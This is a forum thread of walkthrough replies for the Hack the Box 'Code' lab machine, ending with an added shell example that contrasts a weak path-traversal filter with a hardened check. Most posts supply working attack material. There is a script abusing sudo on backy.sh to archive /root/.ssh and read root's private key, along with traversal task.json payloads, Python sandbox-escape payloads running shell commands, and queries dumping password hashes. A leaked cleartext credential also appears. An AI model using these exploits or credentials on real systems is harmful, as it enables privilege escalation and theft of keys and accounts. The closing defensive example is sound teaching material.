Hack the Box Season 7 - Code
by sedinos - Saturday March 22, 2025 at 03:11 PM
#21
To get user.txt and root.txt you can dump the .ssh private key of root, because you can dump everything on root with root privilege. Getting the .ssh private key of root is mandatory.

run

#!/bin/bash

# Config
TARGET="/var/../root/.ssh/" # Bypass to access /root/.ssh
DEST="/home/martin"
TASK_JSON="/tmp/task.json"
BACKUP_DIR="$DEST"
BACKY="/usr/bin/backy.sh"

echo "[*] Generating task.json to archive /root/.ssh"
cat <<EOF > "$TASK_JSON"
{
    "destination": "$DEST",
    "multiprocessing": true,
    "verbose_log": true,
    "directories_to_archive": [
        "$TARGET"
    ]
}
EOF

echo "[*] Executing backy.sh with sudo..."
sudo "$BACKY" "$TASK_JSON"

# Wait a second to ensure archive is created
sleep 2

ARCHIVE=$(ls -t "$BACKUP_DIR"/code*.tar.bz2 2>/dev/null | head -n1)

if [ -z "$ARCHIVE" ]; then
    echo "[!] No archive found in $BACKUP_DIR"
    exit 1
fi

echo "[+] Archive found: $ARCHIVE"
mkdir -p /tmp/unpack_ssh
tar -xjf "$ARCHIVE" -C /tmp/unpack_ssh

echo "[+] Retrieved /root/.ssh content:"
ls -l /tmp/unpack_ssh/root/.ssh

# Optional: show the root private key (if available)
echo "[+] Root private key (if present):"
cat /tmp/unpack_ssh/root/.ssh/id_rsa 2>/dev/null || echo "[!] No private key found."

echo "[+] You can now try: ssh -i /tmp/unpack_ssh/root/.ssh/id_rsa root@localhost"

run "You can now try: ssh -i /tmp/unpack_ssh/root/.ssh/id_rsa root@localhost" Bingo
Reply
#22
thanks very much
Reply
#23
can't extract the archive because of permission of root

Reply
#24
(Mar 22, 2025, 08:14 PM)fgdh Wrote: To get usernames: print([u.username for u in db.session.query(User).all()])

To get password hashes: print([u.password for u in db.session.query(User).all()])

Credentials

martin:nafeelswordsmaster

How do you come up with this? Any resources to learn from?
Reply
#25
{ "directories_to_archive": [ "/home/../../root/" ], "destination": "/tmp/" }

The script checks for basic directory traversal once, so just add a second ../ and you can grab the entire root dir. Then just transfer it to local machine and extract.

Foothold was pretty difficult for me. Finding the right payload was hard, where do you all research this payload?
Reply
#26
(Mar 22, 2025, 08:32 PM)fathermocker Wrote: ().__class__.__bases__[0].__subclasses__()[317](['SHELL CODE'], shell=True)

this works too for foothold. Anyone with any luck for root?

I made a similar payload, but I can't receive the reverse shell. How did you use this payload to get the user flag?
Reply
#27
Writeup user - root
Reply
#28
(Mar 24, 2025, 12:24 PM)akared666 Wrote:
(Mar 22, 2025, 08:32 PM)fathermocker Wrote: ().__class__.__bases__[0].__subclasses__()[317](['SHELL CODE'], shell=True)

this works too for foothold. Anyone with any luck for root?

I made a similar payload, but I can't receive the reverse shell. How did you use this payload to get the user flag?

Okay, I got the payload that can display the result without a reverse shell

print(().__class__.__bases__[0].__subclasses__()[317]("ls",shell=True,stdout=-1).communicate())

Hope the payload can help you guys
Reply
#29
(Mar 24, 2025, 12:38 AM)njro Wrote:
(Mar 22, 2025, 08:14 PM)fgdh Wrote: To get usernames: print([u.username for u in db.session.query(User).all()])

To get password hashes: print([u.password for u in db.session.query(User).all()])

Credentials

martin:nafeelswordsmaster

How do you come up with this? Any resources to learn from?

You can use print(globals()) to see all the available variables without a shell
Reply
#30
(Mar 22, 2025, 08:54 PM)slimeylimey Wrote: For root:

{
    "destination": "/home/martin/backups/",
    "multiprocessing": true,
    "verbose_log": false,
    "directories_to_archive": [
        "/home/....//....//root"
    ]
}

then sudo /usr/bin/backy.sh <task.json>, then go to backups and unarchive.


Why is the tar packet I get with this payload empty?
Reply
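
Added example, not part of any post and not the source of backy.sh: post #25 says the script checks for directory traversal only once, and the task.json quoted in #30 uses `....//`. Assuming a filter that deletes `../` in a single pass and then tests for a /home or /var prefix (the filter, the allow-list and all function names are assumptions), the code below puts that filter beside a check that resolves the path first and never rewrites it.

```sh
#!/bin/sh
# Added example. Function names and the /home + /var allow-list are
# assumptions; this is not the source of backy.sh.

# Weak: delete "../" in one pass, then test the prefix of what is left.
weak_filter() {
    cleaned=$(printf '%s' "$1" | sed 's#\.\./##g')
    case "$cleaned" in
        /home/*|/var/*) printf '%s\n' "$cleaned" ;;
        *) return 1 ;;
    esac
}

# Resolve "." and ".." segments lexically. Symlinks are not followed here;
# on a real host resolve them too (e.g. realpath) before the prefix test.
normalize() {
    out=""
    old_ifs=$IFS
    IFS=/
    set -f                      # no globbing while splitting on "/"
    for seg in $1; do
        case "$seg" in
            ''|.) ;;                      # empty or current dir: skip
            ..)   out=${out%/*} ;;        # parent: drop last segment
            *)    out="$out/$seg" ;;
        esac
    done
    set +f
    IFS=$old_ifs
    printf '%s\n' "${out:-/}"
}

# Hardened: never rewrite the input. Resolve it, then require the resolved
# path to sit under an allowed root, and hand only that path to the archiver.
strict_check() {
    resolved=$(normalize "$1")
    case "$resolved/" in        # trailing "/" so /homework does not match /home/
        /home/*|/var/*) printf '%s\n' "$resolved" ;;
        *) return 1 ;;
    esac
}

payload='/home/....//....//root'       # task.json value quoted in the thread
stripped=$(weak_filter "$payload")     # -> /home/../../root
printf 'weak filter accepts: %s\n' "$stripped"
strict_check "$stripped" >/dev/null || printf 'strict check rejects: %s\n' "$stripped"
```

Left unrewritten, the `....//` value resolves to a literal directory named `....` under /home, so the traversal only exists after the strip has run.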

